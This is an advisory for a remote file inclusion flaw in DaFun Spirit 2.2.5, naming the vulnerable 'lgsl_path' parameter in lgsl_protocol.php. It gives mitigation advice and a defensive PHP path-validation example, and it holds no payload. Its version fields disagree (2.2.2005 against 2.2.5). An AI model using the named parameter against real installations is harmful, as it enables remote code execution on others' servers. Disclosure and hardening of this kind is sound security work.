Vendor: DaFun Spirit
By: mat
CVSS: 7.5 (HIGH)
CWE: Multiple Remote File Include
Product Name: DaFun Spirit
Affected Version From: 2.2.2005
Affected Version To: 2.2.2005
Patch Exists: NO
Related CWE:
CPE:
Platforms Tested: Unknown
DaFun Spirit 2.2.5 Multiple Remote File Include Vulnerability
This vulnerability allows an attacker to include remote files on the target server. It exists in the DaFun Spirit 2.2.5 script: by manipulating the 'lgsl_path' parameter in lgsl_protocol.php, an attacker can include arbitrary files from a remote server. This can lead to remote code execution or information disclosure on the target server.
Mitigation:
To mitigate this vulnerability, it is recommended to update to the latest version of the DaFun Spirit script and validate user input before including files.
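One way to validate the path before including a file, as an added example that is not DaFun Spirit's own code. It assumes the script builds an include path from the 'lgsl_path' request parameter; the directory layout, the allow-list and the helper name `resolve_lgsl_include` are hypothetical.

```php
<?php
// Added example (hypothetical): hardened include for a script that takes a
// directory from the 'lgsl_path' request parameter. Names below are assumed.
// Keep allow_url_include=0 in php.ini (the default since PHP 5.2) as well.

const LGSL_BASE    = __DIR__ . '/lgsl';        // assumed install directory
const LGSL_ALLOWED = ['lgsl_protocol.php'];    // constructed allow-list of includable files

function resolve_lgsl_include($requested, string $file): ?string
{
    // The parameter must be a plain string (not an array such as ?lgsl_path[]=x).
    if (!is_string($requested)) {
        return null;
    }
    // Reject anything with a scheme prefix: http://, ftp://, php://, data:, ...
    // (this also rejects Windows drive letters; only relative paths are expected).
    if (preg_match('#^[a-z][a-z0-9+.\-]*:#i', $requested)) {
        return null;
    }
    // Only fixed, known file names may be included.
    if (!in_array($file, LGSL_ALLOWED, true)) {
        return null;
    }
    // Resolve symlinks and ../ segments; realpath() returns false if the
    // file does not exist on the local filesystem.
    $base   = realpath(LGSL_BASE);
    $target = realpath(LGSL_BASE . '/' . $requested . '/' . $file);
    if ($base === false || $target === false) {
        return null;
    }
    // The resolved file must still be inside the base directory.
    $prefix = $base . DIRECTORY_SEPARATOR;
    if (strncmp($target, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    return $target;
}

// Usage: fail closed when validation does not pass.
$path = resolve_lgsl_include($_GET['lgsl_path'] ?? '.', 'lgsl_protocol.php');
if ($path === null) {
    http_response_code(400);
    exit('invalid lgsl_path');
}
require $path;
```

Where the include directory never needs to vary per request, dropping the parameter and including from a fixed path removes the input entirely.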